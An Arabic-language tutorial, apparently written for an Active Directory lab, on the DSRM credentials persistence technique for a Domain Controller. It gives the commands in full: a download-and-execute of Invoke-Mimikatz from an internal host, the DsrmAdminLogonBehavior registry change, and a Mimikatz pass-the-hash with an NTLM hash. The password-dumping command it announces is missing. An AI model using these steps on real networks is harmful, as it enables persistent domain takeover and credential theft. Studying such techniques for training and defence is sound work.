Persistence - DSRM Credentials

السلام عليكم ورحمة الله وبركاته

الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:

مقدمة:

في هذي المقالة راح اشرح ثاني تكنيك لتثبيت الاختراق على جهاز Domain Controller 


ايش هو تكنيك DSRM Credential؟

كل جهاز Domain Controller يحتوي على Local Administrator طبعا هذا المستخدم نحط الباسورد الخاص فيه وقت ننشأ بيئة Active Directory ف نادر مايتم استخدامه و تغيير الباسورد الخاص فيه او الدخول عليه الا في حالة حدوث كارثه في ال Active Directory عشان يسوي Reset للبيئة :)
 

في هذا التكنيك راح نحاول الحصول على الباسورد الخاص بالـLocal Administrator الخاص بجهاز Domain Controller بحيث يمكننا تنفيذ تكنيك Pass The Hash  في اي وقت لتصفح الـShare Files الخاصه بجهاز Domain Controller
 

الشرح:


طبعا عشان نطبق التكنيك لازم نشغل جلسة PowerShell بمستخدم ضمن قروب Domain Admins

اول شي راح ندخل لجهاز Domain Controller عن طريق هذا الامر:

 

Enter-PSSession -ComputerName dcorp-dc

بعدي  راح اسوي Load ل اداة Mimikatz عن طريق هذا الامر:

iex (iwr http://172.16.100.7/Invoke-Mimikatz.ps1 -UseBasicParsing)

بعد كذا ننفذ هذا الامر عشان نسحب Local Passwords الموجودة على جهاز Domain Controller
 

طيب الان قبل ننفذ تكنيك Pass the hash نحتاج الى اضافة عنصر Logon Behavior في الريجستري ونعطية القيمة 2 عشان نقدر نستخدم هاش الـNTLM الخاص فيه

راح ننفذ هذا الامر:
 

New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD

الان راح ننفذ تكنيك Pass the hash بأداة Mimikatz عن طريق هذا الامر:
 

sekurlsa::pth /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /domain:dcorp-dc /run:powershell.exe

تنويه: في خانة Domain راح تحط اسم جهاز الـDomain Controller بدون ان يتبعهه اسم الدومين

 

الان يمكننا تصفح Share Files الخاص بـDomain Controller عن طريق هذا الامر:
 

dir \\dcorp-dc\C$

وصلنا الى نهاية المقالة واتمنى انها نالت على اعجابكم


شاكر لكم.